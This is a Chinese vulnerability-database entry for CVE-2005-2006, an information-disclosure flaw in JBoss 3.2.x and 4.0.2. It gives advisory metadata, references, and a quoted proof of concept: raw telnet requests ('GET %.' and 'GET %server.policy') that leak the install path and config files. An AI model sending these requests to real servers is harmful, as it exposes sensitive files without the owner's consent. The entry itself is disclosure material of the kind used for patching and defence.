Jboss 远程信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108871 漏洞类型 输入验证
发布时间 2005-06-17 更新时间 2008-06-13
CVE编号 CVE-2005-2006 CNNVD-ID CNNVD-200506-175
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25842
https://www.securityfocus.com/bid/13985
https://cxsecurity.com/issue/WLB-2006020045
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-175
|漏洞详情
JBOSS3.2.2至3.2.7、4.0.2版本中,远程攻击者可借助:(1)一个带有%(百分号)的GET请求-会泄漏安装路径,或(2)一个文件名前加%(百分号)的GET请求-会泄漏文件内容,来获取敏感信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/13985/info

JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.

Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service. 

Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0

Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html

Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0
|受影响的产品
JBoss Group JBoss 4.0.2 JBoss Group JBoss 3.2.7 JBoss Group JBoss 3.2.5 JBoss Group JBoss 3.2.2 JBoss Group JBoss 3.2.1 JBoss Group JBoss 3.0.8 HP System
|参考资料

来源:VUPEN
名称:ADV-2005-0815
链接:http://www.frsirt.com/english/advisories/2005/0815
来源:SECUNIA
名称:15746
链接:http://secunia.com/advisories/15746
来源:BUGTRAQ
名称:20050617JBOSS3.2.2-3.2.7/4.0.2installationpathdisclosure/configdisclosure/versionfingerprinting
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111911095424496&w=2
来源:HP
名称:SSRT061108
链接:http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00597967
来源:BID
名称:13985
链接:http://www.securityfocus.com/bid/13985
来源:BUGTRAQ
名称:20060720CiscoMARS<4.2.1remotecompromise
链接:http://www.securityfocus.com/archive/1/archive/1/440641/100/100/threaded
来源:VUPEN
名称:ADV-2006-0497
链接:http://www.frsirt.com/english/advisories/2006/0497
来源:SECTRACK
名称:1015605
链接:http://securitytracker.com/id?1015605
来源:SREASON
名称:439
链接:http://securityreason.com/securityalert/439
来源:SECUNIA
名称:18789
链接:http://secunia.com/advisories/18789
来源:SECUNIA
名称:17559
链接:http://secunia.com/advisories/17559
来源:FULLDISC
名称:20060720CiscoMARS<4.2.1remotecompromise
链接:http://archives.neohaps